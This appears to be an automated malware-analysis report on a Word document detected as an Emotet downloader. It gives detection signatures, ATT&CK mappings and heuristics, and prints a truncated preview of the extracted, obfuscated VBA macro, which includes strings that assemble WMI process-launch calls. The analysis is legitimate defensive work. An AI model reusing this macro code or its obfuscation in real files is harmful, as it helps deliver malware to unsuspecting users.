MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6865932-0', strongly indicating the Emotet family. High-severity heuristics confirm the presence of VBA macros, specifically an 'AutoOpen' macro that utilizes 'GetObject' for execution. While the VBA code is heavily obfuscated, the presence of these indicators suggests the macro's purpose is to download and execute a secondary payload, a common Emotet tactic.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6865932-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6865932-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 53080 bytes |
SHA-256: b73a221ae8b0024a77777b71f70418c2bd34141d8b479d75d3add7898ff79643 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "d_7_517"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "a2_822"
Function B5_006()
Select Case G__6_0__
Case 799876756
Set i90542 = M714_444
D68806 = (m268_5 * Fix(994679884 / CBool(f134_6))) - O2932777 / Oct(718351250) / 733951487 + CStr(D_4636_) - 630552480 + ChrB(j471036)
Set z_9646 = f_23999
End Select
Select Case j_179460
Case 813741929
Set r722_4__ = N4818325
t9_208 = (a75551_8 * Fix(174170440 / CBool(Z_59_78))) - D14502_ / Oct(224748440) / 619291166 + CStr(K234_9_) - 941603106 + ChrB(z15_06)
Set E0310_ = A9339_
End Select
Select Case S0_7119_
Case 736594396
Set s345388 = K691609
A521058_ = (k3688698 * Fix(677905929 / CBool(B__48_1_))) - X91_84 / Oct(802887856) / 513978655 + CStr(I__05__2) - 668616613 + ChrB(v8__74)
Set T84984 = q_3_1_
End Select
Select Case n_0532_8
Case 276789524
Set L2___4_ = j1__36_6
Z_7225 = (R3_0165 * Fix(314657457 / CBool(z58__0))) - E_2_2642 / Oct(490342039) / 487471396 + CStr(o87_82_1) - 2032775 + ChrB(r7_6100)
Set u6476927 = v_8_67__
End Select
Select Case s23_356
Case 494625981
Set i_13____ = i3_21_
H05820 = (S593_7_0 * Fix(402117374 / CBool(O67_7_5))) - U2_7_358 / Oct(543251194) / 143186982 + CStr(K207605) - 135496895 + ChrB(i621_0)
Set i__47452 = F734_51
End Select
Select Case F_37780
Case 394524712
Set N731_608 = F89965_0
v__31_8_ = (P_766__ * Fix(979878472 / CBool(q5584828))) - d_1__7 / Oct(699769123) / 999748551 + CStr(s_0503) - 109499923 + ChrB(c81791)
Set M_70___ = t77_3_1
End Select
Select Case v6002_
Case 3303482
Set B1957270 = P93_5866
V_66328 = (a517_6 * Fix(248668084 / CBool(o6759_20))) - T305357 / Oct(255729515) / 623170506 + CStr(S97020) - 249337731 + ChrB(i18806)
Set J84762 = p__3739_
End Select
End Function
Function m8_2_9(h877_5_, i1_27_)
On Error Resume Next
Select Case Y2072__
Case 303432300
Set h0598_12 = T868130
H5486_9 = (I418_646 * Fix(874617992 / CBool(W77_72_))) - Y_5302 / Oct(570355307) / 377819296 + CStr(p_96__7_) - 714592625 + ChrB(j5_330)
Set C4__334 = s___3__9
End Select
Select Case N90_5_64
Case 314283047
Set L9749__7 = v1_8138_
G303_6 = (k7929_ * Fix(286693881 / CBool(W_1092))) - b0750_ / Oct(325721441) / 729891521 + CStr(A_46459_) - 28296518 + ChrB(X_46_228)
Set E__502_ = O6544_1
End Select
Select Case E91_37
Case 154721038
Set q0509_ = B02577_
m_388_ = (i19_82 * Fix(476003277 / CBool(P1340494))) - P_9316 / Oct(910342105) / 748510839 + CStr(m4_791_9) - 643605288 + ChrB(f_03_51)
Set c44894_ = S953611
End Select
r1_9624 = K_430__ + "winm" + "gmts:Win32" + z870120 + "_ProcessStartup" + Y3__9_
Select Case j09267_0
Case 454727286
Set f5090_05 = N2_1_4_
w75_6382 = (I9_90_8 * Fix(355793512 / CBool(U_9_5680))) - K3_9_45 / Oct(492417082) / 314381540 + CStr(j__1_7) - 449618907 + ChrB(O_3163)
Set c_9_155 = H_68113_
End Select
Select Case W9226_8
Case 518784214
Set s_54_78 = F60__2
j9_93_7 = (E_0_7680 * Fix(919981346 / CBool(F09_203))) - r2_36__0 / Oct(732794750) / 707739003 + CStr(J1699101) - 94519094 + ChrB(o_8_1_)
Set m45___8 = b__377_
End Select
Select Case K_2109
Case 749773923
Set Y___6_73 = v18_0319
j85_21_ = (M035__ * Fix(97789031 / CBool(o6485505))) - V_91022_ / Oct(457066824) / 988176140 + CStr(I3133_0) - 565826934 + ChrB(o2_9523)
Set q6__50 = L__9637
End Select
c210_8_ = Y0730_ + "winm" + "gmts:Win32" + R____3 + "_Process" + j_2702
Select Case L0491629
Case 341928767
Set i_9_46_7 = a6__53
j0_638_ = (Q6_412 * Fix(828022406 / CBool(k_39_6))) - k46_0443 / Oct(667703637) / 130521407 + CStr(l21340) - 18816916 + ChrB(X51_2714)
Set i37_9059 = D6___89
End Select
Select Case c637413
Case 634563125
Set D__0__4 = j_26_7_
i_637_ = (V_79616 * Fix(898498262 / C
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.